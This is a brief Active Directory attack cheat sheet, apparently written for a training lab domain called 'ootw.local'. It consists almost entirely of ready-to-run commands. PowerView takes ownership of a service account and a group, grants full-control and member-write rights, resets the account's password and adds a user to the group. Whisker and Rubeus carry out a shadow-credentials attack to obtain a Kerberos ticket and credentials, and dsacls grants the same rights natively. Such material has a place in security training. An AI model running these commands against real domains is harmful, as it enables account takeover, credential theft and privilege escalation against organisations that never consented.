PowerView setup:
Import-Module .\PowerView.ps1
$Password = ConvertTo-SecureString 'StudentPass2026!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('OOTW\ben.carter', $Password)
Read the owner and ACL before writing:
Get-DomainObject -Identity 'svc_web' -Properties nTSecurityDescriptor
Get-DomainObjectAcl -Identity 'svc_web' -ResolveGUIDs
User Target: Ownership to Full Control
Set-DomainObjectOwner -TargetIdentity 'svc_web' -OwnerIdentity 'ben.carter' -Credential $Cred
Add-DomainObjectAcl -TargetIdentity 'svc_web' -PrincipalIdentity 'ben.carter' -Rights All -Credential $Cred -Verbose
$NewPassword = ConvertTo-SecureString 'WebReset2026!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'svc_web' -AccountPassword $NewPassword -Credential $Cred -Verbose
Shadow Credentials after ownership and DACL control:
.\Whisker.exe add /target:svc_web /domain:ootw.local /dc:OOTW-DC01.ootw.local /path:svc_web.pfx /password:PfxPass2026!
.\Rubeus.exe asktgt /user:svc_web /certificate:svc_web.pfx /password:PfxPass2026! /domain:ootw.local /dc:OOTW-DC01.ootw.local /getcredentials /nowrap
Group Target: Ownership to Member Write
Set-DomainObjectOwner -TargetIdentity 'ACL Operators' -OwnerIdentity 'ben.carter' -Credential $Cred
Add-DomainObjectAcl -TargetIdentity 'ACL Operators' -PrincipalIdentity 'ben.carter' -Rights WriteMembers -Credential $Cred -Verbose
Add-DomainGroupMember -Identity 'ACL Operators' -Members 'alice.wright' -Credential $Cred -Verbose
Get-DomainGroupMember -Identity 'ACL Operators'
Native Path
Native dsacls can grant control after ownership is changed and the DN is known:
dsacls "CN=Web Service,OU=Service Accounts,OU=OOTW Lab,DC=ootw,DC=local" /G "OOTW\ben.carter:GA"
dsacls "CN=ACL Operators,OU=Groups,OU=OOTW Lab,DC=ootw,DC=local" /G "OOTW\ben.carter:WP;member"
Inspect the ACL:
Get-DomainObjectAcl -Identity 'svc_web' -ResolveGUIDs